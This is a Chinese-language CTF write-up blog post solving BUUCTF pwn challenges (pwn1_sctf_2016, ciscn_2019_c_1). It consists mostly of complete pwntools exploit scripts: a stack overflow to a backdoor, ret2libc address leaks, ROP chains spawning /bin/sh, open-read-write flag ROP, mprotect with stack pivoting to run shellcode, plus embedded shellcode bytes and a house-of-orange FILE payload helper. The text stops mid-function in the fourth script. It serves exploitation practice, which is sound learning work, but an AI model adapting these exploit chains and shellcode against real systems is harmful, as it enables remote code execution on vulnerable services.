BUUCTF刷题

前言

最近准备打一下铁三，因为知道有3道pwn题，正好毕业答辩完，刷刷题目，准备一手，只记录有意思的题目，或者自己忘记的知识点或者知识盲区的题目。

一、pwn1_sctf_2016

一道有趣的题目，先来看看函数：

可以发现用到了C++中的replace函数，也就是替代，用you替代了输入中的所有I，这样就能实现输入字符的3倍扩展，那么最后strcpy时就能造成溢出了，这里动态调试稍微计算下栈中ret的距离即可，具体exp如下：

# -*- coding: utf-8 -*-
from pwn import *
from libformatstr import FormatStr
context.log_level = 'debug'
# context.terminal=['tmux','splitw','-h']
context(arch='amd64', os='linux')
# context(arch='i386', os='linux')
local = 0
elf = ELF('./pwn1_sctf_2016')
if local:
    p = process('./pwn1_sctf_2016')
    libc = elf.libc
else:
    p = remote('node3.buuoj.cn',26151)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#onegadget64(libc.so.6)
#more onegadget
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
one64 = [0x45226,0x4527a,0xf0364,0xf1207]
# [rax == NULL;[rsp+0x30] == NULL,[rsp+0x50] == NULL,[rsp+0x70] == NULL]
#onegadget32(libc.so.6) 
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# py32 = fmtstr_payload(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))

# shellcode = asm(shellcraft.sh())
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80' 
shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
#shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # paddding
    payload += p64(system_addr)
    return payload

def get_io_str_jumps_offset(libc):
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset

def house_of_orange_payload(libc, libc_base):
  io_str_jump = libc_base + get_io_str_jumps_offset(libc)
  io_list_all = libc_base + libc.symbols['_IO_list_all']
  system = libc_base + libc.symbols['system']
  bin_sh = libc_base + next(libc.search('/bin/sh'))
  payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
  return payload

sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
def ms(name,addr):
    print name + "---->" + hex(addr)

def debug(mallocr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print }}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+mallocr)))
    else:
        gdb.attach(p,"b *{}".format(hex(mallocr)))

backdoor = 0x8048F0D
py = ''
py += 'I'*0x14
py += 'bbbb'
py += p32(backdoor)
# ru("Tell me something about yourself: ")
# debug(0x80491DE,0)
sl(py)
p.interactive()

二、ciscn_2019_c_1

这题题目本身不难，但是本地打通了远程打不通就挺离谱的，上网查了下发现好像要调整下远程的栈偏移，多加个ret即可，先来分析一波：

这里有个异或加密，形同虚设，因为可以直接通过strlen绕过，我们首字母输入\x00即可，strlen返回0，直接break退出来，就是普通的gets的栈溢出，没有后门，那么就是ret2libc，这里为了复习，尝试了各种操作，下面一步步道来。

1、泄露地址后system(“/bin/sh”)

# -*- coding: utf-8 -*-
from pwn import *
# from libformatstr import FormatStr
context.log_level = 'debug'
# context.terminal=['tmux','splitw','-h']
context(arch='amd64', os='linux')
# context(arch='i386', os='linux')
local = 0
elf = ELF('./ciscn_2019_c_1')
if local:
    p = process('./ciscn_2019_c_1')
    libc = elf.libc
else:
    p = remote('node3.buuoj.cn',29280)
    libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')
#onegadget64(libc.so.6)
#more onegadget
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
one64 = [0x45226,0x4527a,0xf0364,0xf1207]
# [rax == NULL;[rsp+0x30] == NULL,[rsp+0x50] == NULL,[rsp+0x70] == NULL]
#onegadget32(libc.so.6) 
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# py32 = fmtstr_payload(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))

# shellcode = asm(shellcraft.sh())
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80' 
# shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
# shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # paddding
    payload += p64(system_addr)
    return payload

def get_io_str_jumps_offset(libc):
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset

def house_of_orange_payload(libc, libc_base):
  io_str_jump = libc_base + get_io_str_jumps_offset(libc)
  io_list_all = libc_base + libc.symbols['_IO_list_all']
  system = libc_base + libc.symbols['system']
  bin_sh = libc_base + next(libc.search('/bin/sh'))
  payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
  return payload

sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
def ms(name,addr):
    print name + "---->" + hex(addr)

def debug(mallocr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print }}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+mallocr)))
    else:
        gdb.attach(p,"b *{}".format(hex(mallocr)))


get_plt = elf.sym["gets"]
pop_rdi_ret = 0x0000000000400c83
puts_got = elf.got["puts"]
get_got = elf.got["gets"]
puts_plt = elf.sym["puts"]
py = ''
py += '\x00'
py += 'a'*(0x50-1)
py += 'b'*8
py += p64(pop_rdi_ret)
py += p64(get_got)
py += p64(puts_plt)
py += p64(0x0000000004009A0)
ru("Input your choice!")
sl('1')
ru("Input your Plaintext to be encrypted")
sl(py)

ru("Ciphertext")
rc(2)
addr = u64(rc(6).ljust(8,'\x00'))
libc_base = addr - libc.sym["gets"]
system = libc_base + libc.sym["system"]
binsh = libc_base + libc.search("/bin/sh").next()
ms("addr---->",addr)

pop_rdx_rsi_ret = 0x0000000000130569 + libc_base
syscall = 0x00000000000d2745 + libc_base
pop_rax_ret = 0x0000000000043ae8 + libc_base
leave_ret = 0x0000000000054913 + libc_base
ret = 0x00000000000008aa + libc_base
get_plt = elf.sym["gets"]
flag_addr = 0x000000000602000
mprotect  = libc_base + libc.sym['mprotect']


py = ''
py += '\x00'
py += 'a'*(0x50-1)
py += p64(flag_addr+0x178)
py += p64(ret) #栈偏移调整
py += p64(pop_rdi_ret)
py += p64(binsh)
py += p64(system)

ru("Input your Plaintext to be encrypted")
# debug(0x0000000004009E2,0)
sl(py)


p.interactive()

2、泄露地址后rop实现orw打印flag

# -*- coding: utf-8 -*-
from pwn import *
# from libformatstr import FormatStr
context.log_level = 'debug'
# context.terminal=['tmux','splitw','-h']
context(arch='amd64', os='linux')
# context(arch='i386', os='linux')
local = 1
elf = ELF('./ciscn_2019_c_1')
if local:
    p = process('./ciscn_2019_c_1')
    libc = elf.libc
else:
    p = remote('node3.buuoj.cn',29280)
    libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')
#onegadget64(libc.so.6)
#more onegadget
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
one64 = [0x45226,0x4527a,0xf0364,0xf1207]
# [rax == NULL;[rsp+0x30] == NULL,[rsp+0x50] == NULL,[rsp+0x70] == NULL]
#onegadget32(libc.so.6) 
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# py32 = fmtstr_payload(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))

# shellcode = asm(shellcraft.sh())
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80' 
# shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
# shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # paddding
    payload += p64(system_addr)
    return payload

def get_io_str_jumps_offset(libc):
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset

def house_of_orange_payload(libc, libc_base):
  io_str_jump = libc_base + get_io_str_jumps_offset(libc)
  io_list_all = libc_base + libc.symbols['_IO_list_all']
  system = libc_base + libc.symbols['system']
  bin_sh = libc_base + next(libc.search('/bin/sh'))
  payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
  return payload

sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
def ms(name,addr):
    print name + "---->" + hex(addr)

def debug(mallocr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print }}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+mallocr)))
    else:
        gdb.attach(p,"b *{}".format(hex(mallocr)))

# with open('1.txt','wb+') as f:
#     s = ""
#     for i in shellcode:
#         s += "0x" + i.encode("hex")
#     for i in s:
#         f.write(i)

# def mid_overflow(offset,func_got,rdi,rsi,rdx,next_func):
# 	payload = ''
# 	payload += 'a'*offset
#   payload += 'aaaaaaaa'
# 	payload += p64(pppppp_ret)
# 	payload += p64(0)
# 	payload += p64(0)
# 	payload += p64(1)
# 	payload += p64(func_got)
# 	payload += p64(rdx)
# 	payload += p64(rsi)
# 	payload += p64(rdi)
# 	payload += p64(mov_ret)
# 	payload += p64(0)
# 	payload += p64(0)
# 	payload += p64(0)
# 	payload += p64(0)
# 	payload += p64(0)
# 	payload += p64(0)
# 	payload += p64(0)
# 	payload += p64(next_func)
# 	ru('Input:\n')
# 	sd(payload)


def malloc(size,content):
    ru("> ")
    sl('1')
    ru()
    sl(str(size))
    ru()
    sd(content)
def free(index):
    ru("> ")
    sl('3')
    ru()
    sl(str(index))
def edit(index,content):
    ru("> ")
    sl('2')
    ru()
    sl(str(index))
    ru()
    sd(content)
def show(index):
    ru("> ")
    sl('4')
    ru()
    sl(str(index))


get_plt = elf.sym["gets"]
pop_rdi_ret = 0x0000000000400c83
puts_got = elf.got["puts"]
get_got = elf.got["gets"]
puts_plt = elf.sym["puts"]
py = ''
py += '\x00'
py += 'a'*(0x50-1)
py += 'b'*8
py += p64(pop_rdi_ret)
py += p64(get_got)
py += p64(puts_plt)
py += p64(0x0000000004009A0)
ru("Input your choice!")
sl('1')
ru("Input your Plaintext to be encrypted")
sl(py)

ru("Ciphertext")
rc(2)
addr = u64(rc(6).ljust(8,'\x00'))
libc_base = addr - libc.sym["gets"]
system = libc_base + libc.sym["system"]
binsh = libc_base + libc.search("/bin/sh").next()
ms("addr---->",addr)

pop_rdx_rsi_ret = 0x0000000000130569 + libc_base
syscall = 0x00000000000d2745 + libc_base
pop_rax_ret = 0x0000000000043ae8 + libc_base
leave_ret = 0x0000000000054913 + libc_base
ret = 0x00000000000008aa + libc_base
get_plt = elf.sym["gets"]
flag_addr = 0x000000000602000+0x100
mprotect  = libc_base + libc.sym['mprotect']

py = ''
py += '\x00'
py += 'a'*(0x50-1)
py += 'b'*8
# py += p64(ret)
py += p64(pop_rdi_ret)
py += p64(flag_addr)
py += p64(get_plt)
py += p64(pop_rdi_ret)
py += p64(flag_addr)
py += p64(pop_rdx_rsi_ret)
py += p64(0)
py += p64(0)
py += p64(pop_rax_ret)
py += p64(2)
py += p64(syscall)
py += p64(pop_rdi_ret)
py += p64(3)
py += p64(pop_rdx_rsi_ret)
py += p64(0x80)
py += p64(flag_addr+0x300)
py += p64(pop_rax_ret)
py += p64(0)
py += p64(syscall)
py += p64(pop_rdi_ret)
py += p64(1)
py += p64(pop_rax_ret)
py += p64(1)
py += p64(syscall)
ru("Input your Plaintext to be encrypted")
# debug(0x0000000004009E2,0)
sl(py)

sl("./flag")


p.interactive()

3、泄露地址后mprotect再栈迁移实现shellocde执行(orw)

# -*- coding: utf-8 -*-
from pwn import *
# from libformatstr import FormatStr
context.log_level = 'debug'
# context.terminal=['tmux','splitw','-h']
context(arch='amd64', os='linux')
# context(arch='i386', os='linux')
local = 1
elf = ELF('./ciscn_2019_c_1')
if local:
    p = process('./ciscn_2019_c_1')
    libc = elf.libc
else:
    p = remote('node3.buuoj.cn',29280)
    libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')
#onegadget64(libc.so.6)
#more onegadget
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
one64 = [0x45226,0x4527a,0xf0364,0xf1207]
# [rax == NULL;[rsp+0x30] == NULL,[rsp+0x50] == NULL,[rsp+0x70] == NULL]
#onegadget32(libc.so.6) 
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# py32 = fmtstr_payload(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))

# shellcode = asm(shellcraft.sh())
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80' 
# shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
# shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # paddding
    payload += p64(system_addr)
    return payload

def get_io_str_jumps_offset(libc):
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset

def house_of_orange_payload(libc, libc_base):
  io_str_jump = libc_base + get_io_str_jumps_offset(libc)
  io_list_all = libc_base + libc.symbols['_IO_list_all']
  system = libc_base + libc.symbols['system']
  bin_sh = libc_base + next(libc.search('/bin/sh'))
  payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
  return payload

sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
def ms(name,addr):
    print name + "---->" + hex(addr)

def debug(mallocr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print }}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+mallocr)))
    else:
        gdb.attach(p,"b *{}".format(hex(mallocr)))

get_plt = elf.sym["gets"]
pop_rdi_ret = 0x0000000000400c83
puts_got = elf.got["puts"]
get_got = elf.got["gets"]
puts_plt = elf.sym["puts"]
py = ''
py += '\x00'
py += 'a'*(0x50-1)
py += 'b'*8
py += p64(pop_rdi_ret)
py += p64(get_got)
py += p64(puts_plt)
py += p64(0x0000000004009A0)
ru("Input your choice!")
sl('1')
ru("Input your Plaintext to be encrypted")
sl(py)

ru("Ciphertext")
rc(2)
addr = u64(rc(6).ljust(8,'\x00'))
libc_base = addr - libc.sym["gets"]
system = libc_base + libc.sym["system"]
binsh = libc_base + libc.search("/bin/sh").next()
ms("addr---->",addr)

pop_rdx_rsi_ret = 0x0000000000130569 + libc_base
syscall = 0x00000000000d2745 + libc_base
pop_rax_ret = 0x0000000000043ae8 + libc_base
leave_ret = 0x0000000000054913 + libc_base
ret = 0x00000000000008aa + libc_base
get_plt = elf.sym["gets"]
flag_addr = 0x000000000602000 #
mprotect  = libc_base + libc.sym['mprotect']

shellcode644 = asm('''
push 0x67616c66
mov rdi, rsp
mov rsi, 0
mov eax, 2
syscall 

mov rdi, rax
mov rsi, rsp
mov rdx, 0x100
mov eax, 0
syscall

mov rdi, 1
mov rsi, rsp
mov rdx, 0x100
mov eax, 1
syscall
    ''')

py = ''
py += '\x00'
py += 'a'*(0x50-1)
py += p64(flag_addr+0x178)
# py += p64(ret)
py += p64(pop_rdi_ret)
py += p64(flag_addr)
py += p64(pop_rdx_rsi_ret)
py += p64(0x7)
py += p64(0x1000)
py += p64(mprotect)
py += p64(pop_rdi_ret)
py += p64(flag_addr+0x180)
py += p64(get_plt)
py += p64(leave_ret)
ru("Input your Plaintext to be encrypted")
# debug(0x0000000004009E2,0)
sl(py)
# ru("Ciphertext")
sl(p64(flag_addr+0x188)+shellcode644)#栈迁移后跳转到shellcode所在的地址！

p.interactive()

4、泄露地址后mprotect再栈迁移实现shellocde执行(execve)

# -*- coding: utf-8 -*-
from pwn import *
# from libformatstr import FormatStr
context.log_level = 'debug'
# context.terminal=['tmux','splitw','-h']
context(arch='amd64', os='linux')
# context(arch='i386', os='linux')
local = 1
elf = ELF('./ciscn_2019_c_1')
if local:
    p = process('./ciscn_2019_c_1')
    libc = elf.libc
else:
    p = remote('node3.buuoj.cn',29280)
    libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')
#onegadget64(libc.so.6)
#more onegadget
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
one64 = [0x45226,0x4527a,0xf0364,0xf1207]
# [rax == NULL;[rsp+0x30] == NULL,[rsp+0x50] == NULL,[rsp+0x70] == NULL]
#onegadget32(libc.so.6) 
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# py32 = fmtstr_payload(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))

# shellcode = asm(shellcraft.sh())
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80' 
# shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
# shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # paddding
    payload += p64(system_addr)
    return payload

def get_io_str_jumps_offset(libc):
